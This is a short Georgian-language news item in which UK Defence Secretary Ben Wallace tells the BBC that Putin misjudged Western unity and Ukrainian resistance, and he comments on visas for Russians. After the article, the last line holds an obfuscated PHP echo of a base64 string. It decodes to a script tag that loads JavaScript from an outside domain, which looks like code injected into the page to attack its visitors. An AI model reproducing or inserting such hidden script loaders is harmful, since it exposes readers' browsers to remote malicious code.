celsiusi
ავერსი საქკაბელი
პუტინი ფიქრობდა, რომ ჩვენს შეზლონგებზე დავბრუნდებოდით, რუსეთმა სწორად ვერ შეაფასა დასავლეთის ერთიანობა, – ამის შესახებ დიდი ბრიტანეთის თავდაცვის მინისტრმა, ბენ უოლესმა „ბიბისისთან“ ინტერვიუში განაცხადა.
 
უოლესის თქმით, ვლადიმერ პუტინმა არასწორი გათვლები გააკეთა დასავლეთის ერთიანობისა და უკრაინელების მხარდასაჭერად მტკიცედ დგომის თაობაზე, რომელიც ომიდან ექვსი თვის შემდეგაც კი არ გამქრალა.
 
„ის ოცნებობს, რომ ადრე თუ გვიან ჩვენ ყველანი დავბრუნდებით ჩვენს შეზლონგებზე, მაგრამ მარტივი რეალობა არის ის, რომ ჩვენ მიმდინარე მოვლენებში ვხედავთ პირდაპირ საფრთხეს არა მხოლოდ უკრაინისთვის, არამედ ჩვენი ღირებულებებისთვისაც. მსოფლიო ჯერ კიდევ საკმაოდ მტკიცეა და მყარად დგას“, – განაცხადა უოლესმა.
 
გარდა ამისა, ბრიტანეთის თავდაცვის მინისტრის თქმით, რუსეთის პრეზიდენტმა სწორად ვერ შეაფასა უკრაინის წინააღმდეგობის სიძლიერე, რამაც რუსეთი ამ ომში ჩიხში შეიყვანა. „ბიბისისთვის“ მიცემულ ინტერვიუში მან უარყო რუსებისთვის ვიზების გაცემის სრული აკრძალვის იდეა, თუმცა განაცხადა, რომ შესაძლოა, მათთვის ბრიტანეთში შესვლის პირობები გამკაცრდეს.
478
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");